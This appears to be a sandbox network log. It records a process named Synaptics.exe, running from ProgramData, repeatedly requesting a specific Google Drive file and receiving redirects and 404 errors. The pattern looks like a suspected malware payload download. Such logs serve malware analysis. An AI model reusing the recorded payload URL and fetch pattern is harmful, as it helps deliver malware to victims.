2024-12-30 10:49:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Pypd9bsLygdmTk6UTk8ubg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:30 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.8 | 49821 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:29 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QPr1IrBirxWeX7QfP5_CuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.8 | 49825 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:30 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-p33st7Q40zNCGZcpsyV1HQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.8 | 49826 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:30 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC67v4XwYxb7u-am1A_nmiXu2EM7sj2zO7nRCCeAz-dA7dtypUC-chXR4tOjjr5YEe6q1ODh6ZQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-yj_i6Y5hG_eWK2l_ZPiUfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="OhgqDFqQ8DytipOy1mGchg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:30 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.8 | 49827 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:30 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PQyn1dU4ez9CC8axpFuGnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.8 | 49828 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:30 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:31 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7G726QDmTYQMO3q9MSuerIbwfTO9Hl74vBRJVaUUN86zt8mb-ywPAce78x2T0RjPm4
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Ga9R7AHblNJFnJ1BhWw0Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:31 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:31 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="zChFu6ksVeIeijU-8HsB8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:31 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.8 | 49829 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.8 | 49830 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:31 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.8 | 49831 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:31 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.8 | 49832 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            76 | 192.168.2.8 | 49834 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:32 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i35PBjV45Tf8xuqUA1TwDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            77 | 192.168.2.8 | 49836 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:32 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-FNsG9wrFxdhPNuhaCddtMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            78 | 192.168.2.8 | 49839 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-7jgVi0sWWTIrmAiHOYGBCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            79 | 192.168.2.8 | 49840 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC | 1243 | IN | HTTP/1.1 404 Not Found
